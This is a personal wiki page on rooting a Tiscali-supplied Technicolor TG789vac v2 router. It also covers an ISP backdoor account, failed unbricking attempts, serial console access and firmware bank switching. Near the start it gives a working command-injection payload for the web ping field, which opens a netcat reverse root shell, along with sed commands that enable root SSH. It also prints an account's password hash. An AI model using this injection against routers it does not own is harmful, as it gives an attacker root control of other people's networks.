====== Rooting the router Technicolor TG789vac v2 ======

This router **DSL/FTTH Home router** is running **OpenWRT**, it can bee **rooted** with few simple commands. 

I tested the following procedure on a model shipped by **Tiscali**, an Italian Service Provider.

^ Product Vendor      | Technicolor  |
^ Product Name        | MediaAccess TG789vac v2  |
^ Software Version    | 16.3  |
^ Firmware Version    | 16.3.7636-2921002-20170419153951  |
^ Bootloader Version  | 2.0.85  |
^ Hardware Version    | VANT-6  |

The router default IP address is **192.168.1.1** (beware that it has a DHCP server enabled), web access is with **admin** login and **admin** password.

You need a PC connected on the same LAN (I used a GNU/Linux box), issue the following command on the PC:

<code>
nc -lvvp 1025
</code>

this will bind the **TCP port 1025** and **start listening** for an incoming connection.

On the router you have to navigate the **Dignostic** tile, then the **Ping & Traceroute** tab. Inside the **IP Address** text input, write the following command just before clicking the **Send Ping Request** button:

<code>
:::::::;nc 192.168.1.46 1025 -e /bin/sh
</code>

the **IP address** must be the one of your PC. On the PC you will get a **root shell**. Use the **passwd** command to change the root password:

<code>
passwd
Changing password for root
New password: MySecret
Retype password: MySecret
Password for root changed by root
</code>

Finally you have to **permaently enable the ssh access for the root user** (but only from the LAN interface), copy and paste the following commands exactly:

<code>
sed -i.save 's#root:/bin/false#root:/bin/ash#' /etc/passwd
sed -i.save 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i "s/wan/lan/" /etc/config/dropbear
/etc/init.d/dropbear restart
</code>

===== OpenWRT =====

The installed OpenWRT will fetch packages from this URL:

**%%http://downloads.openwrt.org/chaos_calmer/15.05.1/brcm63xx-tch/VANTF/packages/Packages.gz%%**

which indeed brigs the **Not Found** error.

===== The Tiscali Backdoor =====

Once you got ssh access to the rotuer, you can confirm that there is a **Tiscali backdoor**, just look at the **/etc/passwd** file:

<file>
tiscali:x:550:550:tiscali:/home/tiscali:/usr/bin/restricted-clash
</file>

and at the **/etc/shadow** one:

<file>
tiscali:$1$CEK1lG1Q$bcHMHT6KEzDvKJ8ODFyCB0:17275:0:99999:7:::
</file>

The password is unknown, but it is an high security risk to have that account enabled on the Wan side (as it was the Dropbear SSH server, per default). Tiscaly surely knows that password, may be also some bad guy alread had cracked it, but you are not able to change or disable it.

This is enough to justify your right to have root privileges, and use them to lock-down the tiscali backdoor:

<code>
passwd -l tiscali
</code>

===== Router Bricked =====

I succeeded in bricking this router, may be after I installed the **openvpn** package, which required the **kmod-tun** one. I mixed packages from different architectures and sources, so probably I got some unworkable mix. It is probable that my customization went into the overlay partition and the boot partition is still good, but unfortunately I don't know any method to clean or format the overlay.

I tried some recovery procedures, wihtout success.

=== Flash a new firmare via TFTP ===

**Power-off**, keep the **reset switch pressed** and **power-on**. This method can be used to start the **bootp** procedure, which indeed can load and flash the stock firmware from a TFTP server. I did that: it seems that the firmware is loaded because the TFTP server logs the activity and I can see the network traffic. But the router did not revive; I think that the overlay partition is still messed and the router cannot boot properly.

=== Factory reset ===

With the router powered-on and fully booted, **press the reset switch** for 7 seconds or more (someone says 20). The router should erase custom data and restart. Unfortunately this does not work for me, may be because the router is so messed-up, that the reset procedure does not even start.

=== Accessing the serial line ===

I connected a serial adapter (3.3 v) to the **J5** tag soldering three wires to it. **TX** and **RX** lines correspond to **R327** and **R328** resistors. I connected the three pins to a serial-to-USB adapter using Minicom at **115200 8N1**. The serial console is displayed, but it is in read-only mode, no input is accepted.

<code>
Technicolor Gateway
(c) 2015, All rights reserved

Decompressing Bootloader................................
Gateway initialization sequence started
Boot Loader Version : 2.0.85
CPU                 : BCM63168-D0
RAM                 : 256MB
Flash               : 128MB NAND, blocksize=128KB, pagesize=2048B
Board Mnemonic      : VANT-6
Market ID           : FFFCExternal switch id = 53125

Booting             : Bank 1
Magic packet        : 
SW Version          : 0.0.0.0.0
Starting the Linux kernel

[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Linux version 3.4.11-rt19 (repowrt-builder@d0b3de64c70c)
               (gcc version 4.6.4 (OpenWrt/Linaro GCC 4.6-2013.05 r49389) )
               #1 SMP PREEMPT Thu Mar 9 02:28:17 UTC 2017
[    0.000000] VANT-6 prom init
[    0.000000] CPU revision is: 0002a080 (Broadcom BMIPS4350)
</code>

=== Forcing a bank switch ===

Someone says that this Technicolor router has **two memory banks** to store (flash) the firmware.

  * In normal condition, the router boot from bank_1.
  * Flashing via **TFTP** will write to **bank_1** only. It will do so even if the active bank is currently bank_2. It will never set bank_1 as active.
  * You can see what is the **active bank** by reading **/proc/banktable/active** or by reading **serial console** output during bootstrap.
  * Whenever the Gateway **fails to load the firmware image three times** in a row from the active bank, the bootloader will enter Bootfail mode and will try booting from the inactive/passive bank, without setting it as active.
  * To **force the switchover** from one bank to the other, you have to run a command like **echo bank_1 > /proc/banktable/active** as root.

So I immagine at least two methods to force the router to boot from the other bank:

  - Load a bad image via TFTP flashing (e.g. by disconnecting the cable during the upload, or powering the router off during the flash. I did not tried it.
  - Force some **memory read errors** during bootstrap. This can be accomplished by connecting the **RE#** line (pin 8) of the TSOP chip to ground for some short times during bootstrap. This was **[[https://www.ilpuntotecnico.com/forum/index.php/topic,77981.msg238958.html#msg238958|reported to work by some users]]**.

{{tg789vac_v2_tsop-pinout.jpg?200|TSOP pinout}}
===== Credits and Web References =====

  * **[[https://www.paolo9785.com/it/art/90/technicolor-tg789vac-v2-come-ablitare-root-ed-ssh|Technicolor TG789vac V2: come ablitare "root" ed SSH]]**
  * **[[https://alastair.d-silva.org/technicolor-tg789vac-v2-root-access|Technicolor TG789vac V2 Root Access]]**
  * **[[https://pietrotti97.com/pagine/router/mod-fw/2018/08/05/AGTOT-FW.html|Firmware per TG789Vac-v2]]**
  * **[[https://hack-technicolor.readthedocs.io/en/stable/Repository/|Firmware Repository]]**
  * **[[https://hack-technicolor.readthedocs.io/en/stable/Recovery/|Hacking Technicolor Gateways]]**
  * **[[https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/|Hacking the Technicolor TG799vac]]**
  * **[[https://www.ilpuntotecnico.com/forum/index.php/topic,77981.msg238958.html#msg238958|TG789vac v2 iiNET/UNO Flash, Sblocco e Modding]]**